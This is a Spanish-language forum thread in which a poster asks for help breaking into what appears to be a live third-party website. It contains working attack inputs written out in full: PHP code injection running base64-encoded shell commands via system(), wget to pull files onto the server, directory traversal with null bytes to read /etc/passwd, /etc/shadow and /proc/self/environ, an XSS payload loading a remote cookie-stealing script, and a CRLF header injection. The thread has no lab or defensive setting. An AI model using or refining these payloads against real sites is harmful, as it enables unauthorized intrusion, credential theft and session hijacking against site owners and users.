Quiero subir un archivo (en el caso en el que no sea mi pc).
Nada intento el wget host.com/file.txt (en base64) y nada la web no carga...
¿Qué otra cosa puedo hacer?

Bueno si he sido capaz de utilizar el system(ls -l), obviamente es linux. Particularmente:
System   Linux PERSEO 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 2007 i686

Pero no estoy muy familiarizado con la consola de linux (solo lo básico, instalar programas etc).

¿Qué comandos, y de qué manera debería ponerlos en la url para acceder?

Gracias.

Edito: he estado investigando un poco y he empezado a usar el wget como prueba. Lo que he hecho es simplemente escribir system(wget) y sí me sale que tengo que poner la url despues del wget, pero por el problema de los espacios lo he hecho en base64.
Lo que he hecho ha sido: system(base64_decode(XXXCODEENBASE64))
XXXCODEENBASE64=wget xxx.com/phpinfo.txt
Pero no funciona, se tira todo el rato cargando y no hace nada...

Buenas.

Bueno pues estoy intentado utilizar un ataque php injection. Esta es mi situación:


1.-http://localhost/?lang=${@phpinfo()}   FUNCIONA / http://localhost/?lang=http//localhost/phpinfo.txt NO FUNCIONA (obviamente tiene el código php para mostrar el phpinfo).

2.-Me puse a toquetear y a investigar http://localhost/?lang=${@system(ls -l)} NO FUNCIONA, al no funcionar me sale el típico error 500 y me añade %20 en la url (espacio).
Así que pensé en utilizar base64.

3.-http://localhost/?lang=${@system(base64_decode(bHMgLWw))} FUNCIONA

Ahora es aquí donde me atasco. Qué debería hacer para acceder a la máquina. He estado leyendo y hay que subir archivos con wget etc, pero es que no encuentro la fórmula de cómo poner la url ni que archivo subir.

Thanks.  

1.-
Nada, no muestra nada.
action=../../../../../../../../../../proc/self/environ%00.png

No muestra nada cuando action=../../../../../../../../../../etc/shadow%00.png&id=4504

creo q solo es vuln pal passwd

asi k no me deja.

¿Hay algun otro metodo?

Si no se puede con directory traversal, la web es vulnerable tb a:
-ASP.NET Padding Oracle Vulnerability
-Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability


Pero estas si q verdaderamente no se ni por donde empezar...

2.-
EDITO 19/10: He sacado más vuln y es vuln a xss: " onmouseover=prompt(970448) bad="

Yo ya he usado anteriormente en otra web xss usando este codigo:
http://xxxxx.com/?action=best&srt=1>"><script src="http://xxxxx/cookie.js">&dir=1

El problema es que no sé cómo implimentarlo aquí, es decir, he probado de todas formas y maneras:
Vuln: action=best&dir=" onmouseover=prompt(970448) bad="
srt=0
Modificado:
action=best&dir=" onmouseover=<script src="http://xxxxx/cookie.js"> bad="
srt=0
action=best&dir=" onmouseover=alert() bad="
srt=0
action=best&dir=" onmouseover=<script>alert()</script> bad="
srt=0
ETC...
Pero nada funciona, solo el prompt.
3.-
Vale esto es lo referente a xss, pero esque luego tambien es vulnerable a CRLF injection:
/download.php?id=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&t=1287498936

El caso es que no me aparece nada, ¿debería?


Haber si algun alma caritativa se atreve
asias.

En cuanto vuelva on la web lo pruebo, está down ahora mismo.
A sus órdenes.

Wenas, acabo de encontrar una vuln. en una web y es la siguiente:

../../../../../../../../../../etc/passwd%00.png

al ejecutarla en el navegador sale:

¿Cómo puedo explotar esta vuln? gracias.